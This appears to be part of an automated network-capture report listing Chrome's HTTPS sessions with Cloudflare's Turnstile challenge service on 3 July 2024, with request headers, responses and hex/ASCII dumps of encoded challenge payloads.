                                                              Data Ascii: o5vSjpvFpdKhp6Si2Lev3Zi5nt7PnLvPxqepyemko7nOqezJ58DL6fS0ztLN7ejV2dnZBPkA5eTyx9Ph9wLq+gngDtHvCM4HD87lE9ka7vbrAt0LBP3x/OTk/SkA4iD76SAK7BPxCQwzEPEcKBUeCBw7IBIVFBsxQDEyRitCQSVOJVAsIQ4gPzcvJCU0KRAyUkswI0JBMzxGUl5cZT9DJm4sYTFfQ0xyaGxXVltPX21pVTtYbH1DPodchEVnbWi
                                                              2024-07-03 07:40:38 UTC1369INData Raw: 73 75 30 6b 4b 4b 6f 72 38 32 78 30 4a 47 35 72 62 47 30 34 62 6a 5a 76 37 33 41 74 38 62 56 74 2b 4c 61 35 37 76 41 35 65 76 6f 76 75 54 41 38 4b 79 33 30 73 6e 50 2f 51 4c 74 30 39 2f 52 30 77 44 57 31 51 6f 43 35 75 6f 42 36 2f 6e 34 79 51 41 50 30 75 58 72 46 4f 50 7a 46 68 55 4f 38 4f 72 73 49 4e 72 79 36 77 37 65 37 67 50 37 39 42 6b 48 2b 67 6a 70 4b 77 49 45 4d 41 63 79 38 68 4d 6c 41 2f 55 4c 37 52 66 34 45 41 41 66 4e 2f 6f 41 4d 41 41 2b 53 54 45 71 48 52 77 36 43 45 34 49 41 30 55 2b 50 55 51 75 4c 7a 67 59 4f 6a 68 63 4e 54 6f 2f 53 44 6b 39 58 6a 41 2b 48 53 55 35 53 55 64 4a 51 44 68 50 4f 6c 45 71 4b 45 55 2f 4c 31 35 57 65 55 4e 57 59 30 70 6f 56 59 41 79 54 47 39 5a 55 31 4a 30 63 56 39 78 69 48 75 47 53 34 43 4d 6a 48 36 49 63 47 46 6c
                                                              Data Ascii: su0kKKor82x0JG5rbG04bjZv73At8bVt+La57vA5evovuTA8Ky30snP/QLt09/R0wDW1QoC5uoB6/n4yQAP0uXrFOPzFhUO8OrsINry6w7e7gP79BkH+gjpKwIEMAcy8hMlA/UL7Rf4EAAfN/oAMAA+STEqHRw6CE4IA0U+PUQuLzgYOjhcNTo/SDk9XjA+HSU5SUdJQDhPOlEqKEU/L15WeUNWY0poVYAyTG9ZU1J0cV9xiHuGS4CMjH6IcGFl


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.649743104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:40 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:40 UTC375INHTTP/1.1 404 Not Found
                                                              Date: Wed, 03 Jul 2024 07:40:40 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 7
                                                              Connection: close
                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                              cf-chl-out: 2QCk5lnmg/Vz5+Leh/mNbA==$wGqH3Wj9xaw/mcXiawA9wA==
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a8feab28c47-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:40 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                              Data Ascii: invalid


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.649744104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:40 UTC775OUTGET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:40 UTC200INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:40 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 61
                                                              Connection: close
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a91aa5c426a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 1a 08 02 00 00 00 79 15 96 95 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                              Data Ascii: PNGIHDROyIDAT$IENDB`


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.649745104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:41 UTC804OUTGET /cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              Cache-Control: max-age=0
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:41 UTC143INHTTP/1.1 401 Unauthorized
                                                              Date: Wed, 03 Jul 2024 07:40:41 GMT
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Content-Length: 1
                                                              Connection: close
                                                              2024-07-03 07:40:41 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 77 6d 4d 78 4d 4c 68 71 77 4f 34 6d 66 6f 4e 47 4f 77 54 77 55 32 33 70 6f 64 39 4c 75 47 52 62 73 68 37 63 78 68 6c 41 37 6b 63 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gwmMxMLhqwO4mfoNGOwTwU23pod9LuGRbsh7cxhlA7kcAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                              2024-07-03 07:40:41 UTC1INData Raw: 4a
                                                              Data Ascii: J


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.649746104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:41 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:41 UTC200INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:41 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 61
                                                              Connection: close
                                                              Server: cloudflare
                                                              CF-RAY: 89d53a95fea58c21-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 4f 00 00 00 1a 08 02 00 00 00 79 15 96 95 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                              Data Ascii: PNGIHDROyIDAT$IENDB`


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.649750104.17.3.1844434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:40:43 UTC917OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574 HTTP/1.1
                                                              Host: challenges.cloudflare.com
                                                              Connection: keep-alive
                                                              Content-Length: 30351
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Content-type: application/x-www-form-urlencoded
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              CF-Challenge: e7db8d6cd2b6574
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Origin: https://challenges.cloudflare.com
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-07-03 07:40:43 UTC16384OUTData Raw: 76 5f 38 39 64 35 33 61 37 35 39 65 63 38 30 63 62 34 3d 44 6a 43 48 58 55 47 4c 59 47 2d 62 43 51 49 2d 51 2d 59 48 32 43 63 49 63 78 47 41 73 42 48 52 2d 63 33 73 4e 73 43 6a 47 64 73 24 73 42 4d 48 73 4f 43 73 49 48 47 43 55 78 6b 73 79 78 48 52 6a 55 75 73 66 4f 2d 68 70 71 73 51 59 47 51 73 47 41 31 4f 43 48 6e 57 6d 70 79 73 6e 53 61 38 73 52 37 77 54 73 54 6f 43 73 33 57 2d 38 49 48 41 39 71 73 44 34 6a 6a 75 30 33 73 73 54 31 73 44 59 48 73 44 45 4f 4d 47 79 76 63 47 78 51 54 50 24 6a 73 52 4d 4b 55 73 47 44 76 76 4f 55 61 72 35 77 55 42 53 68 69 62 31 51 49 2d 44 4d 5a 44 4d 73 44 62 61 73 24 65 37 4e 7a 42 32 61 73 54 53 42 47 76 75 25 32 62 75 4b 32 50 54 48 62 4f 69 48 45 6a 4a 4f 45 42 33 71 42 50 7a 50 53 79 30 79 49 69 78 5a 38 55 38 79 51
                                                              Data Ascii: v_89d53a759ec80cb4=DjCHXUGLYG-bCQI-Q-YH2CcIcxGAsBHR-c3sNsCjGds$sBMHsOCsIHGCUxksyxHRjUusfO-hpqsQYGQsGA1OCHnWmpysnSa8sR7wTsToCs3W-8IHA9qsD4jju03ssT1sDYHsDEOMGyvcGxQTP$jsRMKUsGDvvOUar5wUBShib1QI-DMZDMsDbas$e7NzB2asTSBGvu%2buK2PTHbOiHEjJOEB3qBPzPSy0yIixZ8U8yQ
                                                              2024-07-03 07:40:43 UTC13967OUTData Raw: 48 63 61 73 78 47 46 73 63 48 61 61 73 75 55 6a 63 69 73 4b 4d 62 4b 6e 48 63 74 73 4c 73 5a 73 24 4d 73 65 2b 2d 48 51 43 55 64 73 69 48 78 2b 79 33 73 67 48 51 73 55 67 73 47 62 24 59 55 78 73 53 48 33 2d 63 75 73 79 73 42 72 68 47 48 55 48 33 2d 55 6f 33 68 73 33 69 34 4a 73 63 48 44 61 63 59 73 6c 48 47 35 73 30 73 55 48 78 49 73 4d 73 65 61 42 48 55 4a 73 74 2d 54 48 63 2b 73 70 61 24 73 63 2d 73 77 4c 52 43 55 67 73 4c 73 52 43 73 33 73 45 73 73 75 47 70 43 4f 4d 24 73 63 71 4d 47 48 52 43 73 30 73 75 73 24 73 73 77 6a 54 69 6e 62 47 4c 73 69 62 54 78 47 46 73 74 56 71 4f 37 2b 73 6c 48 33 61 24 54 73 71 48 73 59 55 2d 73 55 2d 54 49 43 6e 73 64 73 52 61 47 65 48 6f 73 61 73 63 31 65 43 52 43 47 72 73 78 59 78 6a 55 70 73 6a 48 51 6b 47 46 73 6c 48
                                                              Data Ascii: HcasxGFscHaasuUjcisKMbKnHctsLsZs$Mse+-HQCUdsiHx+y3sgHQsUgsGb$YUxsSH3-cusysBrhGHUH3-Uo3hs3i4JscHDacYslHG5s0sUHxIsMseaBHUJst-THc+spa$sc-swLRCUgsLsRCs3sEssuGpCOM$scqMGHRCs0sus$sswjTinbGLsibTxGFstVqO7+slH3a$TsqHsYU-sU-TICnsdsRaGeHosasc1eCRCGrsxYxjUpsjHQkGFslH
                                                              2024-07-03 07:40:43 UTC322INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:40:43 GMT
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Content-Length: 23440
                                                              Connection: close
                                                              cf-chl-gen: YCsawPQ1gtEXoynMCjj7SrXBLvEo2pkiGEpZAWUop0AY3y/yQOQEdeqjSZWpc5pz$QhtwPs6ZmxAd4DMqvTMwvA==
                                                              Server: cloudflare
                                                              CF-RAY: 89d53aa439d2c470-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-07-03 07:40:43 UTC1047INData Raw: 78 72 66 41 67 38 71 35 7a 59 61 4f 76 4d 32 49 6e 5a 32 6d 6a 71 6e 57 6d 4a 6a 43 71 62 6d 63 78 71 32 67 32 73 2b 78 34 38 54 43 70 65 48 57 32 61 58 69 32 38 53 6d 76 62 2f 4c 7a 2f 58 50 73 38 61 71 78 74 54 57 39 72 72 58 31 2f 48 35 33 75 54 77 2f 63 62 7a 38 74 76 47 43 41 63 4d 35 67 73 4a 36 50 77 45 44 38 76 6a 47 4e 66 35 32 76 41 57 48 77 44 58 41 52 44 30 45 78 2f 6a 39 78 6a 34 49 76 76 30 49 78 66 74 4a 6a 49 66 37 53 30 31 38 54 51 68 44 2f 51 62 4d 6a 59 78 4b 76 6f 2f 41 42 6f 32 50 2f 63 43 50 51 64 48 43 68 34 39 53 30 63 50 4f 54 46 4d 54 53 74 53 54 31 41 72 56 45 31 54 4e 43 68 59 53 46 46 63 56 56 77 65 51 56 31 66 58 56 70 68 62 45 45 6c 58 55 41 2f 53 30 64 4b 5a 7a 56 78 51 45 74 35 4d 58 56 2b 57 6e 39 5a 65 6c 61 41 58 47 39
                                                              Data Ascii: xrfAg8q5zYaOvM2InZ2mjqnWmJjCqbmcxq2g2s+x48TCpeHW2aXi28Smvb/Lz/XPs8aqxtTW9rrX1/H53uTw/cbz8tvGCAcM5gsJ6PwED8vjGNf52vAWHwDXARD0Ex/j9xj4Ivv0IxftJjIf7S018TQhD/QbMjYxKvo/ABo2P/cCPQdHCh49S0cPOTFMTStST1ArVE1TNChYSFFcVVweQV1fXVphbEElXUA/S0dKZzVxQEt5MXV+Wn9ZelaAXG9
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 52 7a 72 65 36 79 39 6a 61 71 63 71 66 74 4d 33 6a 70 62 6d 67 6f 62 72 61 78 71 75 6f 33 73 48 74 36 4d 2b 79 38 37 58 78 73 50 62 4f 39 37 6e 56 7a 72 4b 2b 77 74 54 77 41 2f 4c 6a 32 4d 6e 44 43 50 63 43 45 41 6e 4a 35 73 6e 68 38 73 76 6c 34 50 58 77 42 76 76 56 35 52 4d 62 47 4e 33 73 2b 78 7a 6a 46 77 41 69 2b 52 76 71 4b 76 34 67 2b 79 63 44 4c 2b 34 53 41 79 67 45 4f 41 77 73 43 44 4d 30 44 50 34 42 46 44 41 37 4c 67 5a 43 47 45 63 64 52 55 4d 65 47 42 6f 75 50 31 42 4c 48 41 31 51 46 6b 67 74 4c 31 59 77 53 53 34 73 46 7a 4d 67 51 68 39 52 51 32 42 48 4e 44 34 30 53 53 6c 5a 4b 54 31 4e 59 30 52 4b 4e 58 4a 6f 61 6c 5a 70 56 6e 64 71 56 56 70 38 59 58 70 2f 55 34 4e 46 58 47 4f 41 5a 31 65 43 54 56 35 68 57 56 39 72 54 6d 4e 4d 62 56 39 71 59 70
                                                              Data Ascii: Rzre6y9jaqcqftM3jpbmgobraxquo3sHt6M+y87XxsPbO97nVzrK+wtTwA/Lj2MnDCPcCEAnJ5snh8svl4PXwBvvV5RMbGN3s+xzjFwAi+RvqKv4g+ycDL+4SAygEOAwsCDM0DP4BFDA7LgZCGEcdRUMeGBouP1BLHA1QFkgtL1YwSS4sFzMgQh9RQ2BHND40SSlZKT1NY0RKNXJoalZpVndqVVp8YXp/U4NFXGOAZ1eCTV5hWV9rTmNMbV9qYp
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 79 72 44 58 73 4a 76 57 33 37 66 57 70 4e 2f 6d 31 63 2f 6d 72 50 44 6f 33 66 43 77 78 63 58 4b 32 65 76 4c 31 64 58 4a 76 66 7a 41 33 74 7a 73 34 4e 62 35 30 74 4c 53 32 4d 7a 36 33 51 58 48 30 65 58 66 38 75 6a 73 43 77 6a 36 38 4f 67 54 44 68 34 58 37 52 77 43 32 51 59 53 48 52 4c 68 41 77 59 4a 39 50 30 48 43 75 6b 52 36 65 2f 77 41 53 4c 30 37 2b 73 55 47 69 73 61 43 77 34 4c 4d 78 4d 2f 52 6b 63 6e 52 42 73 35 4b 69 30 47 47 53 45 61 4c 6b 34 65 53 46 4a 50 55 43 64 4a 52 78 5a 49 4e 68 6f 70 46 6a 73 32 54 7a 68 53 49 6c 64 6c 53 52 77 69 61 6b 49 32 4f 79 30 6e 58 45 4e 69 56 55 78 31 62 6b 31 51 52 6d 6b 76 64 6b 6c 6f 63 6c 52 4e 62 48 5a 58 68 33 42 36 57 33 78 2f 67 33 78 42 55 46 70 4a 54 6d 35 65 62 5a 69 53 6a 32 70 6d 6c 6d 57 65 61 47 68
                                                              Data Ascii: yrDXsJvW37fWpN/m1c/mrPDo3fCwxcXK2evL1dXJvfzA3tzs4Nb50tLS2Mz63QXH0eXf8ujsCwj68OgTDh4X7RwC2QYSHRLhAwYJ9P0HCukR6e/wASL07+sUGisaCw4LMxM/RkcnRBs5Ki0GGSEaLk4eSFJPUCdJRxZINhopFjs2TzhSIldlSRwiakI2Oy0nXENiVUx1bk1QRmkvdkloclRNbHZXh3B6W3x/g3xBUFpJTm5ebZiSj2pmlmWeaGh
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 64 65 78 74 4f 44 6d 71 62 6d 75 76 63 43 72 7a 4d 72 6c 73 36 6e 67 31 4f 37 71 30 38 66 53 37 50 58 2b 41 2f 76 42 42 74 33 34 2b 38 59 49 36 4e 6e 36 2f 41 62 67 7a 66 44 65 7a 2f 30 4c 36 67 48 73 45 39 76 77 38 51 6e 39 46 78 37 68 2f 76 58 76 41 76 77 6a 34 67 73 61 48 2b 30 6c 37 75 6b 52 47 78 4d 57 38 76 34 6e 37 76 55 33 4d 44 67 54 2b 7a 41 70 44 53 34 43 4d 51 45 48 42 44 45 58 4a 6a 51 74 47 7a 73 34 43 78 34 65 50 41 35 58 53 69 30 52 45 79 68 57 4d 56 64 58 54 54 67 34 4d 56 34 7a 49 6b 67 33 4a 42 78 54 51 53 70 6e 59 53 4a 69 5a 32 39 6c 59 54 52 6c 4e 30 6c 4b 56 6d 55 38 5a 6a 68 32 66 30 36 43 57 49 4e 54 59 48 4a 6e 58 6d 57 43 61 56 75 50 68 6f 4e 51 67 32 79 54 61 6e 43 43 6b 57 35 30 66 49 31 72 6e 35 61 66 64 6f 74 6a 6b 6e 4b 5a
                                                              Data Ascii: dextODmqbmuvcCrzMrls6ng1O7q08fS7PX+A/vBBt34+8YI6Nn6/AbgzfDez/0L6gHsE9vw8Qn9Fx7h/vXvAvwj4gsaH+0l7ukRGxMW8v4n7vU3MDgT+zApDS4CMQEHBDEXJjQtGzs4Cx4ePA5XSi0REyhWMVdXTTg4MV4zIkg3JBxTQSpnYSJiZ29lYTRlN0lKVmU8Zjh2f06CWINTYHJnXmWCaVuPhoNQg2yTanCCkW50fI1rn5afdotjknKZ
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 6a 4e 35 2b 6e 45 71 76 4c 4a 78 64 50 4b 71 38 57 31 79 66 76 4b 33 62 2f 4a 7a 2f 6e 5a 75 77 48 61 34 51 72 65 35 51 34 43 2b 42 48 6f 45 75 62 51 7a 78 4c 79 43 2b 4c 35 35 42 51 4c 44 75 6b 58 48 39 6a 64 32 78 49 64 2f 52 48 37 45 2b 4d 4e 48 51 63 68 34 51 4d 44 37 79 38 46 45 6a 45 5a 4a 6a 59 45 4d 6a 49 66 48 43 73 30 4c 79 4d 69 4e 51 4d 53 52 79 5a 48 41 77 67 38 44 55 34 65 50 6b 39 4b 56 45 42 45 44 79 63 4c 54 52 5a 4b 4d 30 35 66 50 78 30 32 4e 78 74 51 4f 44 55 35 53 55 70 67 5a 44 64 6c 57 31 78 67 50 54 31 6c 4d 7a 4a 48 4e 48 70 50 65 33 5a 39 54 6b 70 58 4d 33 31 56 57 46 6c 55 52 49 52 45 68 31 31 6f 66 49 32 4a 66 6d 53 4c 69 6e 79 44 68 46 64 68 55 56 64 6c 6c 58 75 4a 69 57 70 73 56 4a 56 62 65 5a 64 6d 64 59 47 67 61 71 6d 57 6d
                                                              Data Ascii: jN5+nEqvLJxdPKq8W1yfvK3b/Jz/nZuwHa4Qre5Q4C+BHoEubQzxLyC+L55BQLDukXH9jd2xId/RH7E+MNHQch4QMD7y8FEjEZJjYEMjIfHCs0LyMiNQMSRyZHAwg8DU4ePk9KVEBEDycLTRZKM05fPx02NxtQODU5SUpgZDdlW1xgPT1lMzJHNHpPe3Z9TkpXM31VWFlURIREh11ofI2JfmSLinyDhFdhUVdllXuJiWpsVJVbeZdmdYGgaqmWm
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 78 71 4f 44 75 78 61 7a 77 37 4d 72 48 31 76 57 39 74 50 7a 35 30 74 2f 6a 35 4d 54 35 39 65 6e 4a 2f 65 34 48 33 4d 77 4e 44 63 34 42 79 51 6f 4e 45 78 4c 38 45 67 6a 33 2f 65 77 62 49 2b 2f 39 39 69 6a 2b 47 43 45 59 43 2b 62 70 4b 2f 41 4f 44 77 54 77 45 43 6b 6e 41 77 2f 79 42 50 51 36 4b 77 77 4d 49 6a 30 52 50 41 38 50 53 52 56 4c 4e 45 55 6c 53 77 34 4a 44 67 6b 37 55 53 52 56 55 56 55 69 56 6c 52 56 4e 6c 31 5a 58 42 6b 35 55 56 68 66 55 56 38 77 4e 53 51 38 4f 43 70 4b 59 6b 46 4c 54 6d 5a 46 54 32 35 6d 65 56 52 34 62 46 42 58 4f 32 74 38 66 59 46 6a 66 6d 53 43 67 6c 6d 49 53 6c 69 48 54 56 2b 50 53 49 78 70 61 31 52 6a 6a 34 39 70 6b 33 64 37 56 33 4a 36 55 5a 74 5a 6b 34 4e 31 59 35 4b 50 68 48 65 48 6e 49 6c 2b 72 61 43 61 71 71 57 6e 74 58
                                                              Data Ascii: xqODuxazw7MrH1vW9tPz50t/j5MT59enJ/e4H3MwNDc4ByQoNExL8Egj3/ewbI+/99ij+GCEYC+bpK/AODwTwECknAw/yBPQ6KwwMIj0RPA8PSRVLNEUlSw4JDgk7USRVUVUiVlRVNl1ZXBk5UVhfUV8wNSQ8OCpKYkFLTmZFT25meVR4bFBXO2t8fYFjfmSCglmISliHTV+PSIxpa1Rjj49pk3d7V3J6UZtZk4N1Y5KPhHeHnIl+raCaqqWntX
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 36 4e 33 79 30 50 4c 32 75 39 54 6b 37 76 6d 2f 38 75 66 43 41 2f 76 74 32 38 2f 38 37 75 2f 74 44 77 37 54 45 42 67 55 37 4e 73 5a 2f 74 73 59 46 42 76 7a 49 66 67 63 42 51 55 54 43 76 67 58 47 67 33 6e 34 53 41 73 4b 75 38 55 45 2b 34 30 38 78 66 79 4a 78 6f 65 39 78 30 70 4b 68 51 41 51 79 59 6c 49 54 6b 71 4b 53 55 39 4e 30 49 49 4f 7a 41 4c 53 30 51 32 4a 42 68 46 4e 7a 67 32 56 31 59 63 57 47 42 63 4e 53 52 68 52 79 52 67 58 47 4d 38 61 55 46 6b 54 55 31 62 55 6b 46 66 59 6c 51 77 4b 6d 68 30 63 6a 68 63 57 7a 64 37 64 6d 46 68 55 6b 42 6a 50 33 4e 6d 61 6b 52 70 64 58 5a 67 54 49 39 79 63 57 32 48 63 6f 36 55 6c 35 43 44 5a 6f 61 56 57 46 6d 4f 6c 6e 47 43 6f 70 78 35 6c 4b 47 67 6b 34 61 68 70 57 69 4f 6a 4a 71 64 73 36 65 6f 72 6d 71 7a 72 6e 52
                                                              Data Ascii: 6N3y0PL2u9Tk7vm/8ufCA/vt28/87u/tDw7TEBgU7NsZ/tsYFBvzIfgcBQUTCvgXGg3n4SAsKu8UE+408xfyJxoe9x0pKhQAQyYlITkqKSU9N0IIOzALS0Q2JBhFNzg2V1YcWGBcNSRhRyRgXGM8aUFkTU1bUkFfYlQwKmh0cjhcWzd7dmFhUkBjP3NmakRpdXZgTI9ycW2Hco6Ul5CDZoaVWFmOlnGCopx5lKGgk4ahpWiOjJqds6eormqzrnR
                                                              2024-07-03 07:40:43 UTC1369INData Raw: 76 37 74 35 50 6e 44 38 4f 6a 6f 32 50 72 72 78 77 50 35 37 77 62 54 2f 76 4c 30 34 41 4c 35 39 78 63 4d 42 76 73 62 45 41 44 61 41 52 51 45 47 75 63 59 43 52 2f 34 4a 41 7a 6d 36 78 38 52 36 75 38 64 46 68 51 33 46 68 6b 76 4c 79 55 63 39 76 63 77 49 53 41 37 4c 79 59 6b 42 43 55 79 4b 45 4d 31 4c 41 63 70 4f 54 41 4d 48 54 34 7a 4a 44 59 55 51 6b 56 54 50 56 68 53 58 30 31 42 56 6a 31 51 52 46 70 66 56 55 6c 49 59 32 52 4d 59 6d 39 67 55 6c 42 7a 58 56 5a 55 63 32 56 5a 62 32 39 6e 58 56 78 2f 61 56 39 51 50 48 52 6b 51 46 56 79 63 6d 69 48 65 57 32 43 68 34 42 76 63 45 79 42 64 55 2b 54 6b 48 6c 6f 6b 34 74 37 62 48 31 39 67 4a 61 6a 6a 34 4e 31 6d 35 4b 4a 59 32 53 59 69 34 79 72 6d 6f 2b 41 72 36 53 65 6c 59 47 69 6c 35 68 34 70 5a 36 63 67 4b 6d 69
                                                              Data Ascii: v7t5PnD8Ojo2PrrxwP57wbT/vL04AL59xcMBvsbEADaARQEGucYCR/4JAzm6x8R6u8dFhQ3FhkvLyUc9vcwISA7LyYkBCUyKEM1LAcpOTAMHT4zJDYUQkVTPVhSX01BVj1QRFpfVUlIY2RMYm9gUlBzXVZUc2VZb29nXVx/aV9QPHRkQFVycmiHeW2Ch4BvcEyBdU+TkHlok4t7bH19gJajj4N1m5KJY2SYi4yrmo+Ar6SelYGil5h4pZ6cgKmi


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
